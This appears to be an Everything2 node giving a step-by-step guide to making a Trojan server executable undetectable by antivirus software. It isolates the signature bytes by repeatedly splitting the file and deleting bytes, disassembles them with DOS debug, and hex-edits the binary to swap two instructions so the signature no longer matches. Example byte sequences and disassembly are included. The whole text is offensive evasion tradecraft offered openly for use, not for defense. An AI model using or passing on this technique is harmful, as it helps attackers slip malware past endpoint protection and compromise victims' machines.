Lets face it, decent information on this trade has become as difficult as the second to last screen in level 8-4 of Super Mario Brothers... You know, the one that required running under the Hammer Brother and jumping over the infamous lava pit of death! I am assuming in noding this that E2 can handle this sort of information. Also, not unlike an informational suicide node may state, I believe it is important to have the information out there. So here's a step by step 'cuz its something that everyone might as well know.



You will need ...

Begin by creating a new directory and placing your Trojan server.exe in it. Subsequently, run an AV over the directory... it should identify the executable as a computer virus.
Then use the file splitter to cut your exe into separate 1mb sections and repeat running your AV over the directory. It should, again, spot one of the files as a virus.

Feel free to /dev/null-ify the other files.

Keep right on splitting that (now 1mb) partial.exe into smaller sections 'til you get it smaller than the IQ of your average McDonald's cashier, but still large enough to trigger the antivirus.
When it arrives at about 24 bytes, delete the last byte and run your AV... then delete the next to last byte and run it again... and repeat 'til the AV fails to recognise it.

Example:

... 93 05 B4 4A CD 21 ~ Spotted as Trojan
... 93 05 B4 4A CD ~ Spotted as Trojan
... 93 05 B4 4A ~ NOT spotted as Trojan


Then replace the last byte...

... 93 05 B4 4A CD

22 23 51 8C DB 8E C3 ... ~ Spotted as Trojan
23 51 8C DB 8E C3 ... ~ Spotted as Trojan
51 8C DB 8E C3 ... ~ Spotted as Trojan
8C DB 8E C3 ~ NOT Spotted as Trojan


Again, replace the last byte you removed.

Now you should have the smallest number of bytes (maybe about 12) that the AV program will recognize as being the Trojan. Onerous Congratulations, you just found the viral signature. /Insert happy emoticon here

Now you need to find where that sequence of bytes occurs in the original .exe; lets say it is at offset 0D98:0348.

Load your server.exe into Microsoft's 'debug' program with the DOS command 'debug server.exe' and go to that offset, then press U to disassemble the bytes.

51 8C DB 8E C3 8B 1E 93 05 B4 4A CD

0D98:0348 51 PUSH CX

0D98:0349 8CDB MOV BX,DS
0D98:034B 8EC3 MOV ES,BX
0D98:034D 8B1E9305 MOV BX,[0593]
0D98:0351 B44A MOV AH,4A
0D98:0353 CD21 INT 21


Side note:
PUSH CX pushes the CX register onto the stack, and the following instruction MOV BX,DS doesn't alter CX -or- the stack... it is fairly safe to assume we can swap these two instructions and hopefully it wont make a difference to the execution of the program.

So ...

we hexedit '51 8C DB 8E C3':

0D98:0348 51 PUSH CX
0D98:0349 8CDB MOV BX,DS
0D98:034B 8EC3 MOV ES,BX


0D98:0348 8CDB MOV BX,DS
0D98:034A 51 PUSH CX
0D98:034B 8EC3 MOV ES,BX


Log in or register to write something here or to contact authors.